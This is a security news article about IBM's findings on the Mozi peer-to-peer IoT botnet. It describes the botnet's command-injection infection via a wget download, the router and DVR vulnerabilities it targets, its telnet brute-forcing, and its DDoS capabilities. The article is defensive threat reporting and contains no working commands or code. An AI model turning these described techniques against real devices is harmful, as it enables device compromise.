Security Experts:

Connect with us

Hi, what are you looking for?



Mozi Botnet Accounted for Majority of IoT Traffic: IBM

Mozi, a relatively new botnet, has fueled a significant increase in Internet of Things (IoT) botnet activity, IBM reported this week.

Mozi, a relatively new botnet, has fueled a significant increase in Internet of Things (IoT) botnet activity, IBM reported this week.

Showing code overlaps with Mirai and its variants and reusing Gafgyt code, Mozi has been highly active over the past year, and it accounted for 90% of the IoT network traffic observed between October 2019 and June 2020, although it did not attempt to remove competitors from compromised systems, IBM researchers say.

The large increase in IoT attacks, however, might also be the result of a higher number of IoT devices being available worldwide, thus expanding the attack surface. At the moment, IBM notes, there are around 31 billion IoT devices worldwide, with approximately 127 devices being deployed each second.

IBM suggests that Mozi’s success is based on the use of command injection (CMDi) attacks, which rely on misconfigurations in IoT devices. The increased use of IoT and poor configuration protocols are believed to be responsible for the spike, along with the increase in remote work due to COVID-19.

Almost all of the observed attacks targeting IoT devices were employing CMDi for initial access. Mozi leverages CMDi by using a “wget” shell command and then tampering with permissions to facilitate the attackers’ interaction with the affected system.

On vulnerable devices, a file called “mozi.a” was downloaded and then executed on MIPS architecture. The attack targets machines running reduced instruction set computer (RISC) architecture — MIPS is a RISC instruction set architecture — and can provide an adversary with the ability to modify the firmware to plant additional malware.

Mozi targets many vulnerabilities for infection purposes: CVE-2017-17215 (Huawei HG532), CVE-2018-10561 / CVE-2018-10562 (GPON Routers), CVE-2014-8361 (Realtek SDK), CVE-2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link Devices), Eir D1000 wireless router command injection, Netgear setup.cgi unauthenticated RCE, MVPower DVR command execution, D-Link UPnP SOAP command execution, and RCE impacting multiple CCTV-DVR vendors.

The threat, which leverages an infrastructure primarily located in China (84%), is also capable of brute-forcing telnet credentials and uses a hardcoded list for that.

“The Mozi botnet is a peer-to-peer (P2P) botnet based on the distributed sloppy hash table (DSHT) protocol, which can spread via IoT device exploits and weak telnet passwords,” IBM says.

The malware uses ECDSA384 (elliptic curve digital signature algorithm 384) to check its integrity and contains a set of hardcoded DHT public nodes that can be leveraged to join the P2P network.

The botnet can be used for launching distributed denial of service (DDoS) attacks (HTTP, TCP, UDP), can launch command execution attacks, can fetch and execute additional payloads, and can also gather bot information.

“As newer botnet groups, such as Mozi, ramp up operations and overall IoT activity surges, organizations using IoT devices need to be cognizant of the evolving threat. IBM is increasingly seeing enterprise IoT devices under fire from attackers. Command injection remains the primary infection vector of choice for threat actors, reiterating how important it is to change default device settings and use effective penetration testing to find and fix gaps in the armor,” IBM concludes.

Related: FritzFrog Botnet Uses Proprietary P2P Protocol

Related: New ‘Kaiji’ Botnet Attacks Linux, IoT Devices via SSH Brute Force

Related: High-Wattage IoT Botnets Can Manipulate Energy Market: Researchers

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.


Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.


Expert Insights

Related Content


Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.


Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.


The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Application Security

PayPal is alerting roughly 35,000 individuals that their accounts have been targeted in a credential stuffing campaign.


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.


As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...